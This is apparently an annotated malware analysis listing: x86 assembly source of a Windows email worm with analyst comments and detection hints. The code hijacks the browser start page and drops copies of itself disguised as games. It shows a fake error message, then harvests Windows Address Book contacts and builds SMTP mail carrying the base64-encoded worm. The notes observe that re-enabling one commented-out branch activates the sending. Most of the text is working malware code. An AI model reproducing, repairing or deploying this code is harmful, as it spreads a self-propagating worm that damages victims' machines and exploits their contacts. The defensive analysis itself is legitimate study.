;----------------------------------------------------------------------------
; Top-level flow of the sample (analysis notes, code unchanged).
; The program entry point and the parsing that sets parameterA (the "-A"
; flag mentioned below) are above this point and are not in this listing.
; Order of operations: (1) overwrite the browser start page in HKCU,
; (2) drop a padded decoy copy of this binary, (3) exit with a fake error
; unless -A was given, in which case stay resident and fire MassMail on a
; clock trigger.
;----------------------------------------------------------------------------
setStartPage:
; Open HKCU\<szStartPageKey>. RegOpenKeyA returns ERROR_SUCCESS (0) on success;
; any failure skips BOTH the registry write and the decoy drop below.
call RegOpenKeyA, HKEY_CURRENT_USER, offset szStartPageKey, offset hKey
cmp eax, 0
jne endProgram ; open failed -> straight to the exit/resident decision
; create a value
; Detection hint: REG_SZ write of szStartPageValue under szStartPageName.
; The size is the hard-coded 128 rather than the string length, so 128 bytes
; are stored whatever the terminator position. Return value is not checked.
call RegSetValueExA, hKey, offset szStartPageName, 0, REG_SZ, offset szStartPageValue, 128
; close key
call RegCloseKey, hKey
;----------------------------------------------------------------------------
; Create a game in the c:\my downloads directory
;----------------------------------------------------------------------------
createGame:
call CheckDirectory ; check to see if bogus software already exists
cmp eax, -1
je endProgram ; -1 = a decoy is already present; do not drop a second one
call GetSystemTime, offset time
xor eax, eax
mov ax, time.wHour ; eax = 0..23, used as the softwareTable record index
call CreateSoftware, eax ; Select a game to create based on the hour
; NOTE: CreateSoftware's return (0 / -1) is ignored here.
;----------------------------------------------------------------------------
; Main
;----------------------------------------------------------------------------
endProgram:
; parameterA is set outside this listing; per the comment below it reflects
; a "-A" command-line switch (assumption - confirm in the entry code).
cmp parameterA, TRUE
je remainActive
; display a bogus error message and exit if no -A parameter was found
; 16 = MB_ICONHAND/MB_ICONERROR: a plain "error" box to explain away the run.
call MessageBoxA, 0, offset szErrorMessage, offset szErrorTitle, 16
call ExitProcess, 0
remainActive:
; Resident loop: poll the clock every 100 ms and fire MassMail when the
; clock reads hh:01:01. The trigger is an exact minute/second match, so a
; busy host can miss the window; conversely, if MassMail returns while the
; second is still 01 it is entered again in the same second.
call Sleep, 100 ; free up the processor time
call GetSystemTime, offset time ; get the system time
cmp time.wMinute, 1 ; try mass mailing every hour
jne remainActive
cmp time.wSecond, 1
jne remainActive
xor eax, eax
mov ax, time.wDayOfWeek ; eax = 0..6 (Sunday = 0); MassMail reads it from eax as its record index
call MassMail ; select an email message to send based on the day of the week
jmp remainActive
;----------------------------------------------------------------------------
; Functions
;----------------------------------------------------------------------------
CheckDirectory PROC
;
; This function searches the c:\my downloads directory for any
; software that has already been created.
;
; In:  none. Uses the globals szSearchString (the search pattern, not
;      shown), win32_find_data and hFindFile.
; Out: eax = -1  a file was found whose FileSizeLow has low byte 13h
;      eax =  0  otherwise (no files, or none matched)
; Clobbers: eax only (beyond the API calls).
;
; Analysis notes:
;  - The "already dropped" test is only on the low byte of the size
;    (cmp al, 13h), so any file whose size is 13h modulo 256 counts as a
;    prior drop. The decoy sizes come from softwareTable (+50) in
;    CreateSoftware; presumably they end in 13h - verify against the table.
;  - FindFirstFileA's result is stored but never compared with
;    INVALID_HANDLE_VALUE; on failure the loop compares whatever is in
;    win32_find_data, calls FindNextFileA with the bad handle (which fails
;    and returns 0), and then FindClose on it. Net effect: returns 0.
;
call FindFirstFileA, offset szSearchString, offset win32_find_data
mov hFindFile, eax
searchFiles:
mov eax, win32_find_data.FileSizeLow
cmp al, 13h ; low byte of the size only
je fileFound
call FindNextFileA, hFindFile, offset win32_find_data
cmp eax, 0 ; no more exe files left?
jne searchFiles
call FindClose, hFindFile
xor eax, eax ; 0 = nothing matched
ret
fileFound:
call FindClose, hFindFile
mov eax, -1 ; -1 = a matching file already exists
ret
CheckDirectory ENDP
CreateSoftware PROC softwareID:DWORD
;
; This function creates a copy of this virus in the c:\my downloads
; folder and disguises it as a piece of valid software like a
; computer game.
;
; In:  softwareID - index into softwareTable (caller passes the hour,
;      0..23). Records are 54 bytes: the record start is passed to
;      CreateFileA as the file name, and the DWORD at +50 is the target
;      file size.
; Out: eax = 0 on success, -1 if CreateFileA failed.
; Globals written: recordPosition, hFile, numberOfBytes.
; Clobbers: eax, ebx, edx (ebx is used as scratch and not preserved).
;
; Analysis notes:
;  - The SetCurrentDirectoryA result check is commented out, so if the
;    szMyDownloads directory does not exist the decoy is created in
;    whatever the current directory happens to be.
;  - CREATE_NEW means an existing file of the same name makes the call
;    fail (-1), which is the only failure path handled.
;  - 16384 bytes of `buffer` are written, then one byte is written at
;    (size - 1) to pad the file out to the table's size. Neither WriteFile
;    result is checked. Compare with MassMail, which attaches only the
;    first 12288 bytes of the same buffer.
;
call SetCurrentDirectoryA, offset szMyDownloads
;cmp eax, 0
;je createFailure
; get the address of the software record specified in softwareID
xor edx, edx
mov eax, softwareID
mov ebx, 54 ; record size
mul ebx ; eax = softwareID * 54 (edx clobbered)
add eax, offset softwareTable
mov recordPosition, eax ; eax also = lpFileName for CreateFileA below
; create the software in the c:\my downloads folder
call CreateFileA, eax, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_NEW, 0, 0
mov hFile, eax
cmp eax, -1 ; INVALID_HANDLE_VALUE
je createFailure
; write program to file
call WriteFile, hFile, offset buffer, 16384, offset numberOfBytes, 0
; Set the filesize
mov eax, [recordPosition]
add eax, 50 ; DWORD at record+50 = desired decoy size
mov eax, [eax]
dec eax ; eax = filesize - 1
call SetFilePointer, hFile, eax, 0, FILE_BEGIN
; one byte written at the last position extends the file to the table size
call WriteFile, hFile, offset buffer, 1, offset numberOfBytes, 0
; close file
call CloseHandle, hFile
xor eax, eax ; 0 = success
ret
createFailure:
mov eax, -1 ; -1 = could not create the file
ret
CreateSoftware ENDP
MassMail PROC
;
; This function sends an email with the worm attachment to everyone
; in the windows address book.
;
; In:  eax = record index (the caller passes wDayOfWeek, 0..6). This is an
;      implicit register argument; there is no PROC parameter for it.
;      emailTable records are 220 bytes: +0 FROM address, +50 subject,
;      +100 body, +200 attachment file name (offsets as used below).
; Out: nothing meaningful in eax; always falls through to cleanUp.
; Globals: hKey, dataType, szWabValue, bufferSize, hFile, numberOfEmails,
;      pointerToEmails, numberOfBytes, emailAddressUNI/ASC, szQuery,
;      emailMessage, sendBuffer, hSock, and the buffers zeroed at abortSend.
; Helpers not shown in this listing: ConvertUniToAsc (below), mkMail,
;      GetSmtpDomain (below, truncated), ConnectToHost, TimeOut, Base64Encode.
;
; Analysis notes (behaviour of this build):
;  - Address-book harvesting: reads the WAB path from the default value of
;    HKCU\<szWabKey>, copies the .wab file to szWabook and parses the copy:
;    DWORD at 0x64 = entry count, DWORD at 0x60 = offset of the address
;    table, each entry read as 68 bytes of UTF-16 (34 code units).
;    Detection hint: a non-mail process reading the WAB key and copying
;    the .wab file.
;  - Delivery: direct-to-MX SMTP on port 25, after resolving NS/MX via a
;    hand-rolled DNS query (GetSmtpDomain). No SMTP reply is ever parsed;
;    every recv() result is discarded.
;  - IMPORTANT: `je foundSmtp` at the end of the findSmtp loop is commented
;    out, so after three GetSmtpDomain attempts control always reaches
;    `jmp abortSend`. As written, the SMTP conversation (foundSmtp..QUIT)
;    is unreachable and no mail is actually sent by this build; the
;    harvesting, DNS traffic and message construction still happen.
;  - Unchecked results: RegOpenKeyA/RegQueryValueExA, CopyFileA, every
;    ReadFile, every send/recv, and ConnectToHost.
;  - Bounds: the '@' scan has no upper bound (emailAddressASC is 34 bytes),
;    and the lstrcatA chain into emailMessage (4096 bytes) is unbounded;
;    both rely on the WAB contents and the table strings being well-formed.
;  - cleanUp calls WSACleanup even when WSAStartup was never reached or
;    failed, and CloseHandle on hFile even when it is INVALID_HANDLE_VALUE.
;
; get the record position
xor edx, edx
mov ebx, 220 ; record size
mul ebx ; eax = day_of_week * 220 (eax is the implicit argument)
add eax, offset emailTable
mov recordPosition, eax
; get the path of the system WAB file
; szWabKey presumably names the WAB "file name" key; the default value is
; read into szWabValue with bufferSize as the in/out length. No checks.
call RegOpenKeyA, HKEY_CURRENT_USER, offset szWabKey, offset hKey
call RegQueryValueExA, hKey, 0, 0, offset dataType, offset szWabValue, offset bufferSize
call RegCloseKey, hKey
; open the WAB file
; A private copy (szWabook) is made and the copy is opened read-only;
; presumably to avoid a sharing conflict with the mail client. If CopyFileA
; fails and no old copy exists, CreateFileA fails and we go to cleanUp.
call CopyFileA, offset szWabValue, offset szWabook, 0
call CreateFileA, offset szWabook, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0
mov hFile, eax
cmp eax, -1 ; INVALID_HANDLE_VALUE
je cleanUp
; get the number of email addresses
call SetFilePointer, hFile, 64h, 0, FILE_BEGIN
call ReadFile, hFile, offset numberOfEmails, 4, offset numberOfBytes, 0
cmp numberOfEmails, 0
je cleanUp
; get the pointer to the email table
call SetFilePointer, hFile, 60h, 0, FILE_BEGIN
call ReadFile, hFile, offset pointerToEmails, 4, offset numberOfBytes, 0
; seek to the email table
call SetFilePointer, hFile, pointerToEmails, 0, FILE_BEGIN
; initialize winsock
call WSAStartup, 0101h, offset WSAData ; Winsock 1.1
cmp eax, 0
jne cleanUp
sendEmail:
; ---- per-recipient loop: runs numberOfEmails times ----
; get an email address in its UNICODE format
; 68 bytes = 34 UTF-16 code units; ReadFile result unchecked, so a short
; read leaves the (pre-zeroed) remainder of emailAddressUNI in place.
call ReadFile, hFile, offset emailAddressUNI, 68, offset numberOfBytes, 0
; convert the email address to ASCII
call ConvertUniToAsc, offset emailAddressUNI, offset emailAddressASC
; get the domain name from the meail message
; Scan for '@' starting at the second byte; there is no length bound, so an
; address without '@' makes this scan run past emailAddressASC.
mov eax, offset emailAddressASC
findAt:
inc eax
cmp byte ptr [eax], '@'
jne findAt
inc eax ; eax -> text after '@' (the recipient's domain)
call lstrcpyA, offset szQuery, eax ; szQuery = domain, used by GetSmtpDomain
call mkMail ; helper not in this listing; presumably prepares emailMessage
; create the email message
; emailP1..emailP6 are fixed header/MIME fragments; the record supplies
; FROM (+0), subject (+50), body (+100) and attachment name (+200).
call lstrcatA, offset emailMessage, offset emailP1
;append FROM email address
call lstrcatA, offset emailMessage, dword ptr [recordPosition]
call lstrcatA, offset emailMessage, offset emailP2
; append TO email address
call lstrcatA, offset emailMessage, offset emailAddressASC
call lstrcatA, offset emailMessage, offset emailP3
; append subject
mov eax, [recordPosition]
add eax, 50
call lstrcatA, offset emailMessage, eax
call lstrcatA, offset emailMessage, offset emailP4
; append message
mov eax, [recordPosition]
add eax, 100
call lstrcatA, offset emailMessage, eax
call lstrcatA, offset emailMessage, offset emailP5
; append filename
mov eax, [recordPosition]
add eax, 200
call lstrcatA, offset emailMessage, eax
call lstrcatA, offset emailMessage, offset emailP6
; get the smtp server name
; Up to 3 attempts. With `je foundSmtp` commented out, the loop never
; branches to foundSmtp; it always exhausts ecx and jumps to abortSend.
mov ecx, 3
findSmtp:
push ecx ; GetSmtpDomain clobbers ecx
call GetSmtpDomain
pop ecx
cmp eax, 0
; je foundSmtp
dec ecx
cmp ecx, 0
jne findSmtp
jmp abortSend
foundSmtp:
; ---- SMTP session (unreachable in this build, see note above) ----
; connect to the email server
; call lstrcpyA, offset szSMTP, offset szDnsx
call ConnectToHost, offset hSock, offset szSMTP, 25, SOCK_STREAM
call TimeOut, hSock, 5000 ; presumably a 5 s socket timeout
; get response
; Every recv below reads the banner/reply into sendBuffer and ignores it;
; no status code is ever checked.
call recv, hSock, offset sendBuffer, 100, 0
; send the HELO command
call send, hSock, offset helo, 17, 0 ; fixed 17-byte HELO line
; get response
call recv, hSock, offset sendBuffer, 100, 0
call RtlZeroMemory, offset sendBuffer, 100
; send the MAIL FROM command
; "MAIL FROM:<" + record FROM address + ">" built by lstrcatA into the
; 100-byte sendBuffer (no length check).
call lstrcatA, offset sendBuffer, offset szMailFrom
call lstrcatA, offset sendBuffer, dword ptr [recordPosition]
call lstrcatA, offset sendBuffer, offset szBracket
call lstrlenA, offset sendBuffer
call send, hSock, offset sendBuffer, eax, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
call RtlZeroMemory, offset sendBuffer, 100
; send the RCPT TO command
call lstrcatA, offset sendBuffer, offset szMailTo
call lstrcatA, offset sendBuffer, offset emailAddressASC
call lstrcatA, offset sendBuffer, offset szBracket
call lstrlenA, offset sendBuffer
call send, hSock, offset sendBuffer, eax, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the DATA command
call send, hSock, offset sendData, 6, 0 ; 6 bytes, e.g. "DATA\r\n"
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the message data
call lstrlenA, offset emailMessage
call send, hSock, offset emailMessage, eax, 0
; attach the worm to the email message
; 4096 iterations x 3 input bytes = the first 12288 bytes of `buffer`,
; base64-encoded 3 bytes -> 4 characters and sent one quartet per send().
; No line breaks are inserted between quartets here.
mov esi, offset buffer
mov ecx, 4096
attachWorm:
pusha ; Base64Encode / send are not trusted to preserve esi/ecx
call Base64Encode, esi, offset bytes4
call send, hSock, offset bytes4, 4, 0
popa
add esi, 3
dec ecx
cmp ecx, 0
jne attachWorm
call send, hSock, offset emailP7, 22, 0 ; fixed 22-byte MIME trailer
; send the . command
call send, hSock, offset dot, 5, 0 ; 5 bytes, e.g. "\r\n.\r\n"
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the QUIT command
call send, hSock, offset endMail, 6, 0 ; 6 bytes, e.g. "QUIT\r\n"
abortSend:
; Reached both after a completed session and after the findSmtp loop
; gives up. closesocket on hSock is called either way, even though
; GetSmtpDomain already closed its own socket on its success path.
call closesocket, hSock
; clear some buffers
call RtlZeroMemory, offset emailMessage, 4096
call RtlZeroMemory, offset sendBuffer, 100
call RtlZeroMemory, offset szQuery, 100
call RtlZeroMemory, offset szQuery2, 100
call RtlZeroMemory, offset szQueryLabels, 100
call RtlZeroMemory, offset szSMTP, 100
call RtlZeroMemory, offset dnsBuffer, 1000
call RtlZeroMemory, offset emailAddressASC, 34 ; 34 = one ASCII address slot
call RtlZeroMemory, offset emailAddressUNI, 68
dec numberOfEmails
cmp numberOfEmails, 0
jne sendEmail
cleanUp:
; Also reached with hFile = -1 (CreateFileA failure) and before WSAStartup
; has been called; neither case is distinguished here.
call WSACleanup
call CloseHandle, hFile
ret
MassMail ENDP
ConvertUniToAsc PROC uniString:DWORD, ascString:DWORD
;
; This routine converts a zero terminated UNICODE string to an
; ASCII string.
;
; In:  uniString - pointer to a NUL-terminated UTF-16LE string
;      ascString - pointer to the destination byte buffer
; Out: nothing in eax; the low byte of each code unit is written to
;      ascString. The high byte is simply dropped, so non-Latin-1 code
;      units are mangled rather than rejected.
; Clobbers: al, esi, edi (esi/edi are not saved/restored).
;
; Analysis notes:
;  - This is a do/while loop: the first code unit is always copied before
;    the terminator test, and the test looks at the NEXT unit, so the
;    terminating NUL itself is never written to ascString. Callers rely on
;    the destination being pre-zeroed (MassMail zeroes emailAddressASC).
;  - There is no length bound; a source without a 16-bit NUL keeps reading
;    and writing past both buffers.
;
mov esi, uniString ; esi -> current UTF-16 unit
mov edi, ascString ; edi -> next output byte
convertAsc:
mov al, byte ptr [esi] ; low byte of the code unit
mov byte ptr [edi], al
add esi, 2
inc edi
cmp word ptr [esi], 0 ; stop when the NEXT unit is the terminator
jne convertAsc
ret
ConvertUniToAsc ENDP
GetSmtpDomain PROC
;
; This functions gets the domain name of a smtp server
;
; connect to the DNS server
call ConnectToHost, offset hSock, offset szDnsName, 53, SOCK_DGRAM
cmp eax, -1
je smtpFailure
call TimeOut, hSock, 5000
call StringToLabels, offset szQuery, offset szQueryLabels
call QueryDNS, hSock, offset dnsBuffer, 1000, offset szQueryLabels, DNS_TYPE_NS, DNS_CLASS_IN
cmp eax, -1
je smtpFailure
call closesocket, hSock